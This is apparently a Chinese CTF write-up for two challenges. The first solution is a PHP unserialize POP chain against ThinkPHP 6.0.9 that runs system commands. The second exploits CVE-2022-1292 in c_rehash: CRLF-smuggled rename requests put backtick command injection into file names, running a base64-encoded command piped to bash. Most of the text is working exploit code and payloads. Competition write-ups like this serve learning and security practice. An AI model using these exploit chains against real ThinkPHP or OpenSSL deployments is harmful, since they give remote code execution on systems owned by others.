Ezpop

直接用thinkphp6.0.9的链子就行，exp：

<?php
namespace think\model\concern;
trait Attribute{
    private $data=['feng'=>['feng'=>'cat /flag.txt']];
    private $withAttr=['feng'=>['feng'=>'system']];
    protected $visible = ['123'=>'feng'];
    protected $json = ['feng'=>'feng'];
    protected $jsonAssoc = true;
}
trait ModelEvent{
    protected $withEvent;
}
namespace think;
abstract class Model{
    use model\concern\Attribute;
    use model\concern\ModelEvent;
    private $exists;
    private $force;
    private $lazySave;
    protected $suffix;
    function __construct($a = '')
    {
        $this->exists = true;
        $this->force = true;
        $this->lazySave = true;
        $this->withEvent = false;
        $this->suffix = $a;
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model{
}
echo urlencode(serialize(new Pivot(new Pivot())));
?>

然后进入 /index.php/index/test post传a参数即可

online_crt

cve-2022-1292。github上找到了patch。在go里面看到了重命名操作，然后在python里看到有c_rehash操作。结合cve的命令注入，本地搭建环境。发现如果文件名加入反引号可以进行命令执行。所以先在 /getctr 生成一个新文件，然后需要进行clrf进行修改文件名。但是不能在命令中有 / 。所以需要进行绕过。第一步，先把要执行的命令的base64写入a.crt：

uri=/admin%252frename%3foldname%3dc675e14c-5a79-40b7-9a5a-18427c731ba8.crt%26newname%3d`echo%2520Y2F0IC9mbGFn>a.crt`+HTTP/1.1%0d%0aHost%3a+admin%0d%0aUser-Agent%3a+Guest%0d%0aAccept-Encoding%3a+gzip,+deflate%0d%0aAccept-Language%3a+zh-CN,zh%3bq%3d0.9%0d%0aConnection%3a+close%0d%0a%0d%0a

然后去 /createlink 进行命令执行。第二步，执行a.crt的命令并写入b.crt：

uri=/admin%252frename%3foldname%3d7df0575e-5720-4c0c-a1d6-b8aa9835953e.crt%26newname%3d`cat%2520a.crt|base64%2520-d|bash>b.crt`+HTTP/1.1%0d%0aHost%3a+admin%0d%0aUser-Agent%3a+Guest%0d%0aAccept-Encoding%3a+gzip,+deflate%0d%0aAccept-Language%3a+zh-CN,zh%3bq%3d0.9%0d%0aConnection%3a+close%0d%0a%0d%0a

然后去 /createlink 进行命令执行。在b.crt即可得到flag：